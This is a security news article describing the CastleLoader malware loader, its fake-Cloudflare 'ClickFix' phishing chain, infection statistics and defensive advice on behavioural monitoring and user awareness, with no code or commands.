Security researchers have uncovered a new malware loader called CastleLoader Malware , which has quickly emerged as a key player in the cybercriminal ecosystem since early 2025. Disguised under a Cloudflare-themed “ClickFix” phishing technique, the campaign deceives users into running malicious PowerShell commands under the pretense of fixing site access or completing security verification.
The malware is often distributed via convincing fake pages that appear to be from Cloudflare, prompting users to copy a pre-filled script into their system’s Run command. Once executed, this script initiates a silent infection process, ultimately delivering various payloads—ranging from stealers like RedLine and StealC to remote access tools like NetSupport RAT.
CastleLoader Malware deceptive edge lies in its use of fake GitHub repositories, which impersonate legitimate developer tools. These tactics increase user trust and help bypass browser-level or network-based security checks.
A Stealthy and Successful Multi-Stage Attack
Between May and July 2025, researchers recorded 1,634 download attempts and 469 successful infections, marking a striking 28.7% success rate. CastleLoader Malware infrastructure was found using at least seven different C2 servers, some of which specifically targeted enterprise and government environments.
The infection chain begins with JavaScript embedded in fake Cloudflare pages that quietly copies a Base64 PowerShell script to the clipboard. Users, tricked by on-screen instructions, unknowingly execute the script via the Run dialog. This action fetches a ZIP archive containing an AutoIT loader, which uses dynamic API resolution to contact C2 servers and download additional malware.
By using HTTPS and non-suspicious GitHub links, the campaign remains stealthy and agile. The loader leaves almost no artifacts on disk, making it difficult for signature-based antivirus engines to detect it.
Defenders Urged to Shift Toward Behavioral Monitoring
CastleLoader Malware architecture resembles malware-as-a-service (MaaS), with a central dashboard that allows threat actors to track infections, modify payloads, and relaunch campaigns in real time. This modularity enables rapid adaptation to detection methods and contributes to its longevity.
Experts warn that this campaign exemplifies a dangerous trend—abusing user trust in known platforms like Cloudflare and GitHub while using legitimate system utilities like PowerShell and AutoIT. This is a classic “Living off the Land” (LoLBin) strategy, making traditional security solutions less effective.
To counter such threats, cybersecurity professionals are advised to focus on behavioral analytics—monitoring clipboard changes, unusual PowerShell activity, dynamic process behavior, and suspicious outbound connections. User awareness is equally vital: educating staff to verify the source of “fix-it” prompts and to never run copied scripts blindly.
CastleLoader exemplifies the next generation of cyber threats—stealthy, adaptive, and socially engineered. Its use of fake Cloudflare challenges and GitHub-hosted tools signals a growing need for advanced, behavior-focused defenses and user education in today’s threat landscape.
